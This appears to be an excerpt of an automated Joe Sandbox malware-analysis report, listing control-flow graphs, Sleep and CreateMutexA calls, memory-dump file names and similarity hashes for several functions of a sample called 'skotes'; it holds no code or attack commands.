                                                                                                                                                                                                control_flow_graph 56 70a079-70a099 60 70a0c7-70a0e3 56->60 61 70a09b-70a0a7 56->61 62 70a111-70a130 60->62 63 70a0e5-70a0f1 60->63 64 70a0a9-70a0b7 61->64 65 70a0bd-70a0c4 call 71d663 61->65 68 70a132-70a13e 62->68 69 70a15e-70a916 call 7180c0 62->69 66 70a0f3-70a101 63->66 67 70a107-70a10e call 71d663 63->67 64->65 70 70a930-70a994 call 736c6a Sleep CreateMutexA 64->70 65->60 66->67 66->70 67->62 74 70a140-70a14e 68->74 75 70a154-70a15b call 71d663 68->75 86 70a996-70a998 70->86 87 70a9a7-70a9a8 70->87 74->70 74->75 75->69 86->87 88 70a99a-70a9a5 86->88 88->87
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 0070A963
                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00763254), ref: 0070A981
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.1805516995.0000000000701000.00000040.00000001.01000000.00000007.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.1805499933.0000000000700000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805516995.0000000000762000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805572739.0000000000769000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805587121.000000000076B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805604396.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805697952.00000000008D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805710142.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805729017.00000000008EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805741970.00000000008ED000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805754717.00000000008EF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805754717.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805780577.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805793870.0000000000904000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805807789.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805821289.000000000090C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805839157.0000000000928000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805851423.000000000092A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805864974.0000000000934000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805877784.000000000093D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805893377.0000000000951000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805905883.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805917446.0000000000953000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805929917.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805942448.0000000000964000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805954989.0000000000969000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805968133.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805981789.000000000097B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805994352.000000000097C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806006178.000000000097F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806018713.0000000000986000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806030847.0000000000987000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806043560.000000000098F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806055078.0000000000990000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806068705.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806080475.000000000099B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806097306.00000000009B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806109487.00000000009B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806109487.00000000009DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806144181.0000000000A06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806157210.0000000000A07000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806169344.0000000000A08000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806181598.0000000000A0D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806193260.0000000000A0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806206551.0000000000A1D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806218766.0000000000A1E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_700000_skotes.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                • String ID: T2v
                                                                                                                                                                                                • API String ID: 1464230837-3236093702
                                                                                                                                                                                                • Opcode ID: b9acabb8dfa890dcd05b12651f0954ed66686258e1a0c26f119c725268210910
                                                                                                                                                                                                • Instruction ID: 44b931ca175d2968b9577a69dd2b457839ec1bfe0f003ba64b9129233565665a
                                                                                                                                                                                                • Opcode Fuzzy Hash: b9acabb8dfa890dcd05b12651f0954ed66686258e1a0c26f119c725268210910
                                                                                                                                                                                                • Instruction Fuzzy Hash: 46311A31B10304EBEB18DB78CD8975DB7B2DB95310F248319E4149B3D6E77D59808652
                                                                                                                                                                                                Function 0070A1AE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135sleepsynchronizationCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 90 70a1ae-70a1ce 94 70a1d0-70a1dc 90->94 95 70a1fc-70a218 90->95 96 70a1f2-70a1f9 call 71d663 94->96 97 70a1de-70a1ec 94->97 98 70a246-70a265 95->98 99 70a21a-70a226 95->99 96->95 97->96 100 70a935 97->100 104 70a293-70a916 call 7180c0 98->104 105 70a267-70a273 98->105 102 70a228-70a236 99->102 103 70a23c-70a243 call 71d663 99->103 107 70a953-70a994 Sleep CreateMutexA 100->107 108 70a935 call 736c6a 100->108 102->100 102->103 103->98 111 70a275-70a283 105->111 112 70a289-70a290 call 71d663 105->112 119 70a996-70a998 107->119 120 70a9a7-70a9a8 107->120 108->107 111->100 111->112 112->104 119->120 122 70a99a-70a9a5 119->122 122->120
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 0070A963
                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00763254), ref: 0070A981
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.1805516995.0000000000701000.00000040.00000001.01000000.00000007.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.1805499933.0000000000700000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805516995.0000000000762000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805572739.0000000000769000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805587121.000000000076B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805604396.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805697952.00000000008D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805710142.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805729017.00000000008EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805741970.00000000008ED000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805754717.00000000008EF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805754717.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805780577.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805793870.0000000000904000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805807789.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805821289.000000000090C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805839157.0000000000928000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805851423.000000000092A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805864974.0000000000934000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805877784.000000000093D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805893377.0000000000951000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805905883.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805917446.0000000000953000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805929917.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805942448.0000000000964000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805954989.0000000000969000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805968133.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805981789.000000000097B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805994352.000000000097C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806006178.000000000097F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806018713.0000000000986000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806030847.0000000000987000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806043560.000000000098F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806055078.0000000000990000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806068705.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806080475.000000000099B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806097306.00000000009B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806109487.00000000009B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806109487.00000000009DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806144181.0000000000A06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806157210.0000000000A07000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806169344.0000000000A08000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806181598.0000000000A0D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806193260.0000000000A0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806206551.0000000000A1D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806218766.0000000000A1E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_700000_skotes.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                • String ID: T2v
                                                                                                                                                                                                • API String ID: 1464230837-3236093702
                                                                                                                                                                                                • Opcode ID: 860cccfbfe63b15f2bbd9f0a09a81b298184ce3c391c4f76516981aef569cc70
                                                                                                                                                                                                • Instruction ID: bbb4fcd5a1ff1862a0c480ffd234c7458eb15fe3ccc74d118e947a67c0d3e489
                                                                                                                                                                                                • Opcode Fuzzy Hash: 860cccfbfe63b15f2bbd9f0a09a81b298184ce3c391c4f76516981aef569cc70
                                                                                                                                                                                                • Instruction Fuzzy Hash: F4311A31B10305EBEB18DBB8DD8D79DB7B2ABD6310F248329E0149B2D6D77D59808652
                                                                                                                                                                                                Function 0070A418 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133sleepsynchronizationCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 124 70a418-70a438 128 70a466-70a482 124->128 129 70a43a-70a446 124->129 132 70a4b0-70a4cf 128->132 133 70a484-70a490 128->133 130 70a448-70a456 129->130 131 70a45c-70a463 call 71d663 129->131 130->131 136 70a93f-70a949 call 736c6a * 2 130->136 131->128 134 70a4d1-70a4dd 132->134 135 70a4fd-70a916 call 7180c0 132->135 138 70a492-70a4a0 133->138 139 70a4a6-70a4ad call 71d663 133->139 140 70a4f3-70a4fa call 71d663 134->140 141 70a4df-70a4ed 134->141 155 70a94e 136->155 156 70a949 call 736c6a 136->156 138->136 138->139 139->132 140->135 141->136 141->140 157 70a953-70a994 Sleep CreateMutexA 155->157 158 70a94e call 736c6a 155->158 156->155 160 70a996-70a998 157->160 161 70a9a7-70a9a8 157->161 158->157 160->161 162 70a99a-70a9a5 160->162 162->161
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 0070A963
                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00763254), ref: 0070A981
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.1805516995.0000000000701000.00000040.00000001.01000000.00000007.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.1805499933.0000000000700000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805516995.0000000000762000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805572739.0000000000769000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805587121.000000000076B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805604396.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805697952.00000000008D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805710142.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805729017.00000000008EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805741970.00000000008ED000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805754717.00000000008EF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805754717.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805780577.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805793870.0000000000904000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805807789.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805821289.000000000090C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805839157.0000000000928000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805851423.000000000092A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805864974.0000000000934000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805877784.000000000093D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805893377.0000000000951000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805905883.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805917446.0000000000953000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805929917.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805942448.0000000000964000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805954989.0000000000969000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805968133.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805981789.000000000097B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805994352.000000000097C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806006178.000000000097F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806018713.0000000000986000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806030847.0000000000987000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806043560.000000000098F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806055078.0000000000990000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806068705.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806080475.000000000099B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806097306.00000000009B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806109487.00000000009B9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806109487.00000000009DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806144181.0000000000A06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806157210.0000000000A07000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806169344.0000000000A08000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806181598.0000000000A0D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806193260.0000000000A0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806206551.0000000000A1D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806218766.0000000000A1E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_700000_skotes.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                • String ID: T2v
                                                                                                                                                                                                • API String ID: 1464230837-3236093702
                                                                                                                                                                                                • Opcode ID: ef016ff5a6d8592b48b986356350f76c83ae4fe1ab1820e6ad0a1e5478fe1423
                                                                                                                                                                                                • Instruction ID: 301c469e9e99801b1aafc7e4650a209797b49b221b8eae1d6be7ccc9c3c6b73f
                                                                                                                                                                                                • Opcode Fuzzy Hash: ef016ff5a6d8592b48b986356350f76c83ae4fe1ab1820e6ad0a1e5478fe1423
                                                                                                                                                                                                • Instruction Fuzzy Hash: A3312B31B10340EBEB189BBCDDCD76DB6B1EB95310F248318E4149B2D6E7BD59808662
                                                                                                                                                                                                Function 0070A54D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132sleepsynchronizationCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 164 70a54d-70a56d 168 70a59b-70a5b7 164->168 169 70a56f-70a57b 164->169 172 70a5e5-70a604 168->172 173 70a5b9-70a5c5 168->173 170 70a591-70a598 call 71d663 169->170 171 70a57d-70a58b 169->171 170->168 171->170 176 70a944-70a949 call 736c6a 171->176 174 70a632-70a916 call 7180c0 172->174 175 70a606-70a612 172->175 178 70a5c7-70a5d5 173->178 179 70a5db-70a5e2 call 71d663 173->179 181 70a614-70a622 175->181 182 70a628-70a62f call 71d663 175->182 190 70a94e 176->190 191 70a949 call 736c6a 176->191 178->176 178->179 179->172 181->176 181->182 182->174 194 70a953-70a994 Sleep CreateMutexA 190->194 195 70a94e call 736c6a 190->195 191->190 198 70a996-70a998 194->198 199 70a9a7-70a9a8 194->199 195->194 198->199 200 70a99a-70a9a5 198->200 200->199
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 0070A963
                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00763254), ref: 0070A981
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.1805516995.0000000000701000.00000040.00000001.01000000.00000007.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.1805499933.0000000000700000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805516995.0000000000762000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805572739.0000000000769000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805587121.000000000076B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805604396.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805697952.00000000008D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805710142.00000000008D4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805729017.00000000008EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805741970.00000000008ED000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805754717.00000000008EF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805754717.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805780577.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805793870.0000000000904000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805807789.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805821289.000000000090C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805839157.0000000000928000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805851423.000000000092A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805864974.0000000000934000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805877784.000000000093D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805893377.0000000000951000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805905883.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805917446.0000000000953000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805929917.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805942448.0000000000964000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805954989.0000000000969000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805968133.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805981789.000000000097B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1805994352.000000000097C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806006178.000000000097F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806018713.0000000000986000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806030847.0000000000987000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806043560.000000000098F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.1806055078.0000000000990000.00000040.00000001.01000000.00000007.sdmpDownload File
